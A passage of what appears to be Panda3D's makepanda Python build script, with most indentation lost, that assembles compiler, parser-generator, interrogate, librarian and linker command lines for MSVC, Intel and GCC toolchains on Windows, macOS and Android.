LibDirectory("PHYSX", SDK["PHYSXLIBS"])
if (GetHost() == "darwin"):
LibName("PHYSX", SDK["PHYSXLIBS"] + "/osxstatic/PhysXCooking.a")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/osxstatic/PhysXCore.a")
else:
LibName("PHYSX", "-lPhysXLoader")
LibName("PHYSX", "-lNxCharacter")
DefSymbol("WITHINPANDA", "WITHIN_PANDA", "1")
if GetLinkAllStatic():
DefSymbol("ALWAYS", "LINK_ALL_STATIC")
if GetTarget() == 'android':
DefSymbol("ALWAYS", "ANDROID")
if not PkgSkip("EIGEN"):
if GetOptimize() >= 3:
if COMPILER == "MSVC":
# Squeeze out a bit more performance on MSVC builds...
# Only do this if EIGEN_NO_DEBUG is also set, otherwise it
# will turn them into runtime assertions.
DefSymbol("ALWAYS", "EIGEN_NO_STATIC_ASSERT")
########################################################################
##
## Give a Status Report on Command-Line Options
##
########################################################################
def printStatus(header,warnings):
if GetVerbose():
print("")
print("-------------------------------------------------------------------")
print(header)
tkeep = ""
tomit = ""
for x in PkgListGet():
if PkgSkip(x):
tomit = tomit + x + " "
else:
tkeep = tkeep + x + " "
if RTDIST:
print("Makepanda: Runtime distribution build")
elif RUNTIME:
print("Makepanda: Runtime build")
else:
print("Makepanda: Regular build")
print("Makepanda: Compiler: %s" % (COMPILER))
print("Makepanda: Optimize: %d" % (GetOptimize()))
print("Makepanda: Keep Pkg: %s" % (tkeep))
print("Makepanda: Omit Pkg: %s" % (tomit))
if GENMAN:
print("Makepanda: Generate API reference manual")
else:
print("Makepanda: Don't generate API reference manual")
if GetHost() == "windows" and not RTDIST:
if INSTALLER:
print("Makepanda: Build installer, using %s" % (COMPRESSOR))
else:
print("Makepanda: Don't build installer")
print("Makepanda: Version ID: %s" % (VERSION))
for x in warnings:
print("Makepanda: %s" % (x))
print("-------------------------------------------------------------------")
print("")
sys.stdout.flush()
########################################################################
##
## BracketNameWithQuotes
##
########################################################################
def BracketNameWithQuotes(name):
# Workaround for OSX bug - compiler doesn't like those flags quoted.
if (name.startswith("-framework")): return name
if (name.startswith("-dylib_file")): return name
# Don't add quotes when it's not necessary.
if " " not in name: return name
# Leave an already-quoted name as-is; quote everything else so that spaces within paths survive command-line parsing.
if (name.startswith('"') and name.endswith('"')): return name
else: return '"' + name + '"'
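# A small, never-called sketch illustrating the rules above (the inputs are
# assumptions for illustration, not names used elsewhere in the build):
def _bracket_name_examples():
    assert BracketNameWithQuotes("-framework Cocoa") == "-framework Cocoa"
    assert BracketNameWithQuotes("panda.lib") == "panda.lib"
    assert BracketNameWithQuotes("C:/Program Files/x.lib") == '"C:/Program Files/x.lib"'
    assert BracketNameWithQuotes('"already quoted"') == '"already quoted"'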
########################################################################
##
## CompileCxx
##
########################################################################
def CompileCxx(obj,src,opts):
ipath = GetListOption(opts, "DIR:")
optlevel = GetOptimizeOption(opts)
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
cmd = "cl "
if GetTargetArch() == 'x64':
cmd += "/favor:blend "
cmd += "/wd4996 /wd4275 /wd4273 "
# We still target Windows XP.
cmd += "/DWINVER=0x501 "
# Work around a WinXP/2003 bug when using VS 2015+.
if SDK.get("VISUALSTUDIO_VERSION") >= (14,0):
cmd += "/Zc:threadSafeInit- "
cmd += "/Fo" + obj + " /nologo /c"
if GetTargetArch() != 'x64' and (not PkgSkip("SSE2") or 'SSE2' in opts):
cmd += " /arch:SSE2"
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
if (opts.count('MSFORSCOPE')): cmd += ' /Zc:forScope-'
if (optlevel==1): cmd += " /MDd /Zi /RTCs /GS"
if (optlevel==2): cmd += " /MDd /Zi"
if (optlevel==3): cmd += " /MD /Zi /GS- /O2 /Ob2 /Oi /Ot /fp:fast"
if (optlevel==4):
cmd += " /MD /Zi /GS- /Ox /Ob2 /Oi /Ot /fp:fast /DFORCE_INLINING /DNDEBUG /GL"
cmd += " /Oy /Zp16" # jean-claude added /Zp16 to ensure correct static alignment for SSEx
cmd += " /Fd" + os.path.splitext(obj)[0] + ".pdb"
building = GetValueOption(opts, "BUILDING:")
if (building):
cmd += " /DBUILDING_" + building
if ("BIGOBJ" in opts) or GetTargetArch() == 'x64':
cmd += " /bigobj"
cmd += " /Zm300 /DWIN32_VC /DWIN32"
if 'EXCEPTIONS' in opts:
cmd += " /EHsc"
else:
cmd += " /D_HAS_EXCEPTIONS=0"
if 'RTTI' not in opts:
cmd += " /GR-"
if GetTargetArch() == 'x64':
cmd += " /DWIN64_VC /DWIN64"
if WINDOWS_SDK.startswith('7.') and MSVC_VERSION > (10,):
# To preserve Windows XP compatibility.
cmd += " /D_USING_V110_SDK71_"
cmd += " /W3 " + BracketNameWithQuotes(src)
oscmd(cmd)
else:
cmd = "icl "
if GetTargetArch() == 'x64':
cmd += "/favor:blend "
cmd += "/wd4996 /wd4275 /wd4267 /wd4101 /wd4273 "
cmd += "/DWINVER=0x501 "
cmd += "/Fo" + obj + " /c"
for x in ipath: cmd += " /I" + x
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += " /I" + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += " /D" + var + "=" + val
if (opts.count('MSFORSCOPE')): cmd += ' /Zc:forScope-'
if (optlevel==1): cmd += " /MDd /Zi /RTCs /GS"
if (optlevel==2): cmd += " /MDd /Zi /arch:SSE3"
# core changes from jean-claude (dec 2011)
# ----------------------------------------
# performance is sought at levels 3 & 4
# -----------------------------------------
if (optlevel==3):
cmd += " /MD /Zi /O2 /Oi /Ot /arch:SSE3"
cmd += " /Ob0"
cmd += " /Qipo-" # beware of IPO !!!
## Lesson learned: Don't use /GL flag -> end result is MESSY
## ----------------------------------------------------------------
if (optlevel==4):
cmd += " /MD /Zi /O3 /Oi /Ot /Ob0 /Yc /DNDEBUG" # /Ob0 was added along the way at 47%
cmd += " /Qipo" # optimization multi file
# for 3 & 4 optimization levels
# -----------------------------
if (optlevel>=3):
cmd += " /fp:fast=2"
cmd += " /Qftz"
cmd += " /Qfp-speculation:fast"
cmd += " /Qopt-matmul" # needs /O2 or /O3
cmd += " /Qprec-div-"
cmd += " /Qsimd"
cmd += " /QxHost" # compile for the host CPU; distribution builds should probably enforce an explicit /arch: setting
cmd += " /Quse-intel-optimized-headers" # use intel optimized headers
cmd += " /Qparallel" # enable parallelization
cmd += " /Qvc10" # for Microsoft Visual C++ 2010
## PCH files coexistence: the /Qpchi option causes the Intel C++ Compiler to name its
## PCH files with a .pchi filename suffix and reduce build time.
## The /Qpchi option is on by default but interferes with Microsoft libs; so use /Qpchi- to turn it off.
## This deserves a closer look, since compile time is quite sensitive to this setting!
cmd += " /Qpchi-" # keep it this way!
## Inlining seems to be an issue here! (the linker doesn't find the necessary info later on)
## ------------------------------------
## so don't use cmd += " /DFORCE_INLINING" (need to check why with the Panda developers!)
## Inline expansion /Ob1 : Allow functions marked inline to be inlined.
## Inline any /Ob2 : Inline functions deemed appropriate by compiler.
## Ctor displacement /vd0 : Disable constructor displacement.
## Choose this option only if no class constructors or destructors call virtual functions.
## Use /vd1 (default) to enable. Alternate: #pragma vtordisp
## Best case ptrs /vmb : Use best case "pointer to class member" representation.
## Use this option if you always define a class before you declare a pointer to a member of the class.
## The compiler will issue an error if it encounters a pointer declaration before the class is defined.
## Alternate: #pragma pointers_to_members
cmd += " /Fd" + os.path.splitext(obj)[0] + ".pdb"
building = GetValueOption(opts, "BUILDING:")
if (building): cmd += " /DBUILDING_" + building
if ("BIGOBJ" in opts) or GetTargetArch() == 'x64':
cmd += " /bigobj"
# level of warnings and optimization reports
if GetVerbose():
cmd += " /W3 " # or /W4 or /Wall
cmd += " /Qopt-report:2 /Qopt-report-phase:hlo /Qopt-report-phase:hpo" # some optimization reports
else:
cmd += " /W1 "
cmd += " /EHa /Zm300 /DWIN32_VC /DWIN32"
if GetTargetArch() == 'x64':
cmd += " /DWIN64_VC /DWIN64"
cmd += " " + BracketNameWithQuotes(src)
oscmd(cmd)
if (COMPILER=="GCC"):
if (src.endswith(".c")): cmd = GetCC() +' -fPIC -c -o ' + obj
else: cmd = GetCXX()+' -std=gnu++11 -ftemplate-depth-70 -fPIC -c -o ' + obj
for (opt, dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -I' + BracketNameWithQuotes(dir)
for (opt, dir) in FRAMEWORKDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -F' + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts): cmd += ' -D' + var + '=' + val
for x in ipath: cmd += ' -I' + x
if not GetLinkAllStatic() and 'NOHIDDEN' not in opts:
cmd += ' -fvisibility=hidden'
# Mac-specific flags.
if GetTarget() == "darwin":
cmd += " -Wno-deprecated-declarations"
if OSXTARGET is not None:
cmd += " -isysroot " + SDK["MACOSX"]
cmd += " -mmacosx-version-min=%d.%d" % (OSXTARGET)
for arch in OSX_ARCHS:
if 'NOARCH:' + arch.upper() not in opts:
cmd += " -arch %s" % arch
if "SYSROOT" in SDK:
if GetTarget() != "android":
cmd += ' --sysroot=%s' % (SDK["SYSROOT"])
else:
ndk_dir = SDK["ANDROID_NDK"].replace('\\', '/')
cmd += ' -isystem %s/sysroot/usr/include' % (ndk_dir)
cmd += ' -isystem %s/sysroot/usr/include/%s' % (ndk_dir, SDK["ANDROID_TRIPLE"])
cmd += ' -no-canonical-prefixes'
# Android-specific flags.
arch = GetTargetArch()
if GetTarget() == "android":
# Most of the specific optimization flags here were
# just copied from the default Android Makefiles.
if "ANDROID_API" in SDK:
cmd += ' -D__ANDROID_API__=' + str(SDK["ANDROID_API"])
if "ANDROID_GCC_TOOLCHAIN" in SDK:
cmd += ' -gcc-toolchain ' + SDK["ANDROID_GCC_TOOLCHAIN"].replace('\\', '/')
cmd += ' -ffunction-sections -funwind-tables'
if arch == 'armv7a':
cmd += ' -target armv7-none-linux-androideabi'
cmd += ' -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16'
cmd += ' -fno-integrated-as'
elif arch == 'arm':
cmd += ' -target armv5te-none-linux-androideabi'
cmd += ' -march=armv5te -mtune=xscale -msoft-float'
cmd += ' -fno-integrated-as'
elif arch == 'aarch64':
cmd += ' -target aarch64-none-linux-android'
elif arch == 'mips':
cmd += ' -target mipsel-none-linux-android'
cmd += ' -mips32'
elif arch == 'mips64':
cmd += ' -target mips64el-none-linux-android'
cmd += ' -fintegrated-as'
elif arch == 'x86':
cmd += ' -target i686-none-linux-android'
cmd += ' -march=i686 -mtune=intel -mssse3 -mfpmath=sse -m32'
cmd += ' -mstackrealign'
elif arch == 'x86_64':
cmd += ' -target x86_64-none-linux-android'
cmd += ' -march=x86-64 -msse4.2 -mpopcnt -m64 -mtune=intel'
cmd += " -Wa,--noexecstack"
# Do we want thumb or arm instructions?
if arch.startswith('arm'):
if optlevel >= 3:
cmd += ' -mthumb'
else:
cmd += ' -marm'
# Enable SIMD instructions if requested
if arch.startswith('arm') and PkgSkip("NEON") == 0:
cmd += ' -mfpu=neon'
else:
cmd += " -pthread"
if not src.endswith(".c"):
# We don't use exceptions for most modules.
if 'EXCEPTIONS' in opts:
cmd += " -fexceptions"
else:
cmd += " -fno-exceptions"
if src.endswith(".mm"):
# Work around Apple compiler bug.
cmd += " -U__EXCEPTIONS"
if 'RTTI' not in opts:
# We always disable RTTI on Android for memory usage reasons.
if optlevel >= 4 or GetTarget() == "android":
cmd += " -fno-rtti"
if ('SSE2' in opts or not PkgSkip("SSE2")) and not arch.startswith("arm") and arch != 'aarch64':
cmd += " -msse2"
# Needed by Python, Panda, and Eigen, all of which break strict-aliasing rules.
cmd += " -fno-strict-aliasing"
if optlevel >= 3:
cmd += " -ffast-math -fno-stack-protector"
if optlevel == 3:
# Fast math is nice, but we'd like to see NaN in dev builds.
cmd += " -fno-finite-math-only"
if (optlevel==1): cmd += " -ggdb -D_DEBUG"
if (optlevel==2): cmd += " -O1 -D_DEBUG"
if (optlevel==3): cmd += " -O2"
if (optlevel==4): cmd += " -O3 -DNDEBUG"
if src.endswith(".c"):
cmd += ' ' + CFLAGS
else:
cmd += ' ' + CXXFLAGS
cmd = cmd.rstrip()
building = GetValueOption(opts, "BUILDING:")
if (building): cmd += " -DBUILDING_" + building
cmd += ' ' + BracketNameWithQuotes(src)
oscmd(cmd)
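# Roughly what the GCC branch assembles for an ordinary optimize-3 C++ file on
# Linux (abridged and illustrative; real commands also carry the -I/-D flags
# collected above):
#   g++ -std=gnu++11 -ftemplate-depth-70 -fPIC -c -o built/tmp/foo.o \
#       -Ibuilt/tmp -Ibuilt/include -fvisibility=hidden -pthread \
#       -fno-exceptions -msse2 -fno-strict-aliasing -ffast-math \
#       -fno-stack-protector -fno-finite-math-only -O2 panda/src/foo.cxx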
########################################################################
##
## CompileBison
##
########################################################################
def CompileBison(wobj, wsrc, opts):
ifile = os.path.basename(wsrc)
wdsth = GetOutputDir()+"/include/" + ifile[:-4] + ".h"
wdstc = GetOutputDir()+"/tmp/" + ifile + ".cxx"
pre = GetValueOption(opts, "BISONPREFIX_")
bison = GetBison()
if bison is None:
# We don't have bison. See if there is a prebuilt file.
base, ext = os.path.splitext(wsrc)
if os.path.isfile(base + '.h.prebuilt') and \
os.path.isfile(base + '.cxx.prebuilt'):
CopyFile(wdstc, base + '.cxx.prebuilt')
CopyFile(wdsth, base + '.h.prebuilt')
else:
exit('Could not find bison!')
else:
oscmd(bison + ' -y -d -o'+GetOutputDir()+'/tmp/'+ifile+'.c -p '+pre+' '+wsrc)
CopyFile(wdstc, GetOutputDir()+"/tmp/"+ifile+".c")
CopyFile(wdsth, GetOutputDir()+"/tmp/"+ifile+".h")
# Finally, compile the generated source file.
CompileCxx(wobj, wdstc, opts + ["FLEX"])
########################################################################
##
## CompileFlex
##
########################################################################
def CompileFlex(wobj,wsrc,opts):
ifile = os.path.basename(wsrc)
wdst = GetOutputDir()+"/tmp/"+ifile+".cxx"
pre = GetValueOption(opts, "BISONPREFIX_")
dashi = opts.count("FLEXDASHI")
flex = GetFlex()
if flex is None:
# We don't have flex. See if there is a prebuilt file.
base, ext = os.path.splitext(wsrc)
if os.path.isfile(base + '.cxx.prebuilt'):
CopyFile(wdst, base + '.cxx.prebuilt')
else:
exit('Could not find flex!')
else:
if (dashi):
oscmd(flex + " -i -P" + pre + " -o"+wdst+" "+wsrc)
else:
oscmd(flex + " -P" + pre + " -o"+wdst+" "+wsrc)
# Finally, compile the generated source file.
CompileCxx(wobj,wdst,opts)
########################################################################
##
## CompileIgate
##
########################################################################
def CompileIgate(woutd,wsrc,opts):
outbase = os.path.basename(woutd)[:-3]
woutc = GetOutputDir()+"/tmp/"+outbase+"_igate.cxx"
wobj = FindLocation(outbase + "_igate.obj", [])
srcdir = GetValueOption(opts, "SRCDIR:")
module = GetValueOption(opts, "IMOD:")
library = GetValueOption(opts, "ILIB:")
ipath = GetListOption(opts, "DIR:")
if (PkgSkip("PYTHON")):
WriteFile(woutc, "")
WriteFile(woutd, "")
ConditionalWriteFile(woutd, "")
return (wobj, woutc, opts)
if not CrossCompiling():
# If we're compiling for this platform, we can use the one we've built.
cmd = os.path.join(GetOutputDir(), 'bin', 'interrogate')
else:
# Assume that interrogate is on the PATH somewhere.
cmd = 'interrogate'
if GetVerbose():
cmd += ' -v'
cmd += ' -srcdir %s -I%s' % (srcdir, srcdir)
cmd += ' -DCPPPARSER -D__STDC__=1 -D__cplusplus=201103L'
if (COMPILER=="MSVC"):
cmd += ' -DWIN32_VC -DWIN32 -D_WIN32'
if GetTargetArch() == 'x64':
cmd += ' -DWIN64_VC -DWIN64 -D_WIN64 -D_M_X64 -D_M_AMD64'
else:
cmd += ' -D_M_IX86'
# NOTE: this 1600 value is the version number for VC2010.
cmd += ' -D_MSC_VER=1600 -D"__declspec(param)=" -D__cdecl -D_near -D_far -D__near -D__far -D__stdcall'
if (COMPILER=="GCC"):
cmd += ' -D__attribute__\(x\)='
target_arch = GetTargetArch()
if target_arch in ("x86_64", "amd64"):
cmd += ' -D_LP64'
elif target_arch == 'aarch64':
cmd += ' -D_LP64 -D__LP64__ -D__aarch64__'
else:
cmd += ' -D__i386__'
target = GetTarget()
if target == 'darwin':
cmd += ' -D__APPLE__'
elif target == 'android':
cmd += ' -D__ANDROID__'
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += ' -D_DEBUG'
if (optlevel==2): cmd += ' -D_DEBUG'
if (optlevel==3): pass
if (optlevel==4): cmd += ' -DNDEBUG'
cmd += ' -oc ' + woutc + ' -od ' + woutd
cmd += ' -fnames -string -refcount -assert -python-native'
cmd += ' -S' + GetOutputDir() + '/include/parser-inc'
# Add -I, -S and -D flags
for x in ipath:
cmd += ' -I' + BracketNameWithQuotes(x)
for (opt,dir) in INCDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -S' + BracketNameWithQuotes(dir)
for (opt,var,val) in DEFSYMBOLS:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' -D' + var + '=' + val
#building = GetValueOption(opts, "BUILDING:")
#if (building): cmd += " -DBUILDING_"+building
cmd += ' -module ' + module + ' -library ' + library
for x in wsrc:
if (x.startswith("/")):
cmd += ' ' + BracketNameWithQuotes(x)
else:
cmd += ' ' + BracketNameWithQuotes(os.path.basename(x))
oscmd(cmd)
return (wobj, woutc, opts)
########################################################################
##
## CompileImod
##
########################################################################
def CompileImod(wobj, wsrc, opts):
module = GetValueOption(opts, "IMOD:")
library = GetValueOption(opts, "ILIB:")
if (COMPILER=="MSVC"):
woutc = wobj[:-4]+".cxx"
if (COMPILER=="GCC"):
woutc = wobj[:-2]+".cxx"
if (PkgSkip("PYTHON")):
WriteFile(woutc, "")
CompileCxx(wobj, woutc, opts)
return
if not CrossCompiling():
# If we're compiling for this platform, we can use the one we've built.
cmd = os.path.join(GetOutputDir(), 'bin', 'interrogate_module')
else:
# Assume that interrogate_module is on the PATH somewhere.
cmd = 'interrogate_module'
cmd += ' -oc ' + woutc + ' -module ' + module + ' -library ' + library + ' -python-native'
importmod = GetValueOption(opts, "IMPORT:")
if importmod:
cmd += ' -import ' + importmod
for x in wsrc: cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
CompileCxx(wobj,woutc,opts)
return
########################################################################
##
## CompileLib
##
########################################################################
def CompileLib(lib, obj, opts):
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
# Use the MSVC librarian (link /lib) to build the static library.
cmd = 'link /lib /nologo'
if GetOptimizeOption(opts) == 4:
cmd += " /LTCG"
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
cmd += ' /OUT:' + BracketNameWithQuotes(lib)
for x in obj:
if not x.endswith('.lib'):
cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
else:
# Choose Intel linker; from Jean-Claude
cmd = 'xilink /verbose:lib /lib '
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
cmd += ' /OUT:' + BracketNameWithQuotes(lib)
for x in obj: cmd += ' ' + BracketNameWithQuotes(x)
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\ipp\lib\ia32"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\TBB\Lib\ia32\vc10"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\compiler\lib\ia32"'
oscmd(cmd)
if (COMPILER=="GCC"):
if GetTarget() == 'darwin':
cmd = 'libtool -static -o ' + BracketNameWithQuotes(lib)
else:
cmd = GetAR() + ' cru ' + BracketNameWithQuotes(lib)
for x in obj:
cmd += ' ' + BracketNameWithQuotes(x)
oscmd(cmd)
oscmd(GetRanlib() + ' ' + BracketNameWithQuotes(lib))
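# On the GCC side this amounts to either (macOS)
#   libtool -static -o libfoo.a a.o b.o
# or, on other platforms,
#   ar cru libfoo.a a.o b.o   followed by   ranlib libfoo.a
# (or the cross-toolchain equivalents of ar/ranlib), with libfoo.a and the .o
# names standing in for the real target and object files.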
########################################################################
##
## CompileLink
##
########################################################################
def CompileLink(dll, obj, opts):
if (COMPILER=="MSVC"):
if not BOOUSEINTELCOMPILER:
cmd = "link /nologo "
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
if ("MFC" not in opts):
cmd += " /NOD:MFC90.LIB /NOD:MFC80.LIB /NOD:LIBCMT"
cmd += " /NOD:LIBCI.LIB /DEBUG"
cmd += " /nod:libc /nod:libcmtd /nod:atlthunk /nod:atls /nod:atlsd"
if (GetOrigExt(dll) != ".exe"): cmd += " /DLL"
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += " /MAP /MAPINFO:EXPORTS /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==2): cmd += " /MAP:NUL /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==3): cmd += " /MAP:NUL /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if (optlevel==4): cmd += " /MAP:NUL /LTCG /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if ("MFC" in opts):
if (optlevel<=2): cmd += " /NOD:MSVCRTD.LIB mfcs100d.lib MSVCRTD.lib"
else: cmd += " /NOD:MSVCRT.LIB mfcs100.lib MSVCRT.lib"
cmd += " /FIXED:NO /OPT:REF /STACK:4194304 /INCREMENTAL:NO "
cmd += ' /OUT:' + BracketNameWithQuotes(dll)
if not PkgSkip("PYTHON"):
                # Python is enabled for this build, but if this particular
                # target doesn't link with it, don't let the Python import
                # library be picked up implicitly.
if "PYTHON" not in opts:
pythonv = SDK["PYTHONVERSION"].replace('.', '')
if optlevel <= 2:
cmd += ' /NOD:{}d.lib'.format(pythonv)
else:
cmd += ' /NOD:{}.lib'.format(pythonv)
# Yes, we know we are importing "locally defined symbols".
for x in obj:
if x.endswith('libp3pystub.lib'):
cmd += ' /ignore:4049,4217'
break
# Set the subsystem. Specify that we want to target Windows XP.
subsystem = GetValueOption(opts, "SUBSYSTEM:") or "CONSOLE"
cmd += " /SUBSYSTEM:" + subsystem
if GetTargetArch() == 'x64':
cmd += ",5.02"
else:
cmd += ",5.01"
if dll.endswith(".dll") or dll.endswith(".pyd"):
cmd += ' /IMPLIB:' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(dll))[0] + ".lib"
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' /LIBPATH:' + BracketNameWithQuotes(dir)
for x in obj:
if x.endswith(".dll") or x.endswith(".pyd"):
cmd += ' ' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(x))[0] + ".lib"
elif x.endswith(".lib"):
dname = os.path.splitext(os.path.basename(x))[0] + ".dll"
if (GetOrigExt(x) != ".ilb" and os.path.exists(GetOutputDir()+"/bin/" + dname)):
exit("Error: in makepanda, specify "+dname+", not "+x)
cmd += ' ' + BracketNameWithQuotes(x)
elif x.endswith(".def"):
cmd += ' /DEF:' + BracketNameWithQuotes(x)
elif x.endswith(".dat"):
pass
else:
cmd += ' ' + BracketNameWithQuotes(x)
if (GetOrigExt(dll)==".exe" and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " " + BracketNameWithQuotes(name)
oscmd(cmd)
else:
cmd = "xilink"
if GetVerbose(): cmd += " /verbose:lib"
if HasTargetArch():
cmd += " /MACHINE:" + GetTargetArch().upper()
if ("MFC" not in opts):
cmd += " /NOD:MFC90.LIB /NOD:MFC80.LIB /NOD:LIBCMT"
cmd += " /NOD:LIBCI.LIB /DEBUG"
cmd += " /nod:libc /nod:libcmtd /nod:atlthunk /nod:atls"
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\ipp\lib\ia32"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\TBB\Lib\ia32\vc10"'
cmd += ' /LIBPATH:"C:\Program Files (x86)\Intel\Composer XE 2011 SP1\compiler\lib\ia32"'
if (GetOrigExt(dll) != ".exe"): cmd += " /DLL"
optlevel = GetOptimizeOption(opts)
if (optlevel==1): cmd += " /MAP /MAPINFO:EXPORTS /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==2): cmd += " /MAP:NUL /NOD:MSVCRT.LIB /NOD:MSVCPRT.LIB /NOD:MSVCIRT.LIB"
if (optlevel==3): cmd += " /MAP:NUL /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if (optlevel==4): cmd += " /MAP:NUL /LTCG /NOD:MSVCRTD.LIB /NOD:MSVCPRTD.LIB /NOD:MSVCIRTD.LIB"
if ("MFC" in opts):
if (optlevel<=2): cmd += " /NOD:MSVCRTD.LIB mfcs100d.lib MSVCRTD.lib"
else: cmd += " /NOD:MSVCRT.LIB mfcs100.lib MSVCRT.lib"
cmd += " /FIXED:NO /OPT:REF /STACK:4194304 /INCREMENTAL:NO "
cmd += ' /OUT:' + BracketNameWithQuotes(dll)
subsystem = GetValueOption(opts, "SUBSYSTEM:")
if subsystem:
cmd += " /SUBSYSTEM:" + subsystem
if dll.endswith(".dll"):
cmd += ' /IMPLIB:' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(dll))[0] + ".lib"
for (opt, dir) in LIBDIRECTORIES:
if (opt=="ALWAYS") or (opt in opts):
cmd += ' /LIBPATH:' + BracketNameWithQuotes(dir)
for x in obj:
if x.endswith(".dll") or x.endswith(".pyd"):
cmd += ' ' + GetOutputDir() + '/lib/' + os.path.splitext(os.path.basename(x))[0] + ".lib"
elif x.endswith(".lib"):
                    dname = os.path.splitext(os.path.basename(x))[0] + ".dll"
if (GetOrigExt(x) != ".ilb" and os.path.exists(GetOutputDir()+"/bin/" + os.path.splitext(os.path.basename(x))[0] + ".dll")):
exit("Error: in makepanda, specify "+dname+", not "+x)
cmd += ' ' + BracketNameWithQuotes(x)
elif x.endswith(".def"):
cmd += ' /DEF:' + BracketNameWithQuotes(x)
elif x.endswith(".dat"):
pass
else:
cmd += ' ' + BracketNameWithQuotes(x)
if (GetOrigExt(dll)==".exe" and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
for (opt, name) in LIBNAMES:
if (opt=="ALWAYS") or (opt in opts):
cmd += " " + BracketNameWithQuotes(name)
oscmd(cmd)
if COMPILER == "GCC":
cxx = GetCXX()
if GetOrigExt(dll) == ".exe":
cmd = cxx + ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
if GetTarget() == "android":
# Necessary to work around an issue with libandroid depending on vendor libraries
cmd += ' -Wl,--allow-shlib-undefined'
else:
if (GetTarget() == "darwin"):
cmd = cxx + ' -undefined dynamic_lookup'
if ("BUNDLE" in opts or GetOrigExt(dll) == ".pyd"):
cmd += ' -bundle '
else:
install_name = '@loader_path/../lib/' + os.path.basename(dll)
cmd += ' -dynamiclib -install_name ' + install_name
cmd += ' -compatibility_version ' + MAJOR_VERSION + ' -current_version ' + VERSION
cmd += ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
else:
cmd = cxx + ' -shared'
# Always set soname on Android to avoid a linker warning when loading the library.
if "MODULE" not in opts or GetTarget() == 'android':
cmd += " -Wl,-soname=" + os.path.basename(dll)
cmd += ' -o ' + dll + ' -L' + GetOutputDir() + '/lib -L' + GetOutputDir() + '/tmp'
for x in obj:
if GetOrigExt(x) != ".dat":
cmd += ' ' + x
if (GetOrigExt(dll) == ".exe" and GetTarget() == 'windows' and "NOICON" not in opts):
cmd += " " + GetOutputDir() + "/tmp/pandaIcon.res"
# Mac OS X specific flags.
if GetTarget() == 'darwin':
cmd += " -headerpad_max_install_names"
if OSXTARGET is not None:
cmd += " -isysroot " + SDK["MACOSX"] + " -Wl,-syslibroot," + SDK["MACOSX"]
cmd += " -mmacosx-version-min=%d.%d" % (OSXTARGET)
for arch in OSX_ARCHS:
if 'NOARCH:' + arch.upper() not in opts:
cmd += " -arch %s" % arch
elif GetTarget() == 'android':
arch = GetTargetArch()
if "ANDROID_GCC_TOOLCHAIN" in SDK:
cmd += ' -gcc-toolchain ' + SDK["ANDROID_GCC_TOOLCHAIN"].replace('\\', '/')
cmd += " -Wl,-z,noexecstack -Wl,-z,relro -Wl,-z,now"
if arch == 'armv7a':
cmd += ' -target armv7-none-linux-androideabi'
cmd += " -march=armv7-a -Wl,--fix-cortex-a8"
elif arch == 'arm':
cmd += ' -target armv5te-none-linux-androideabi'
elif arch == 'aarch64':
cmd += ' -target aarch64-none-linux-android'
elif arch == 'mips':
cmd += ' -target mipsel-none-linux-android'
cmd += ' -mips32'
elif arch == 'mips64':
cmd += ' -target mips64el-none-linux-android'
elif arch == 'x86':
cmd += ' -target i686-none-linux-android'
elif arch == 'x86_64':
cmd += ' -target x86_64-none-linux-android'
cmd += ' -lc -lm'
else:
cmd += " -pthread"
if "SYSROOT" in SDK:
cmd += " --sysroot=%s -no-canonical-prefixes" % (SDK["SYSROOT"])
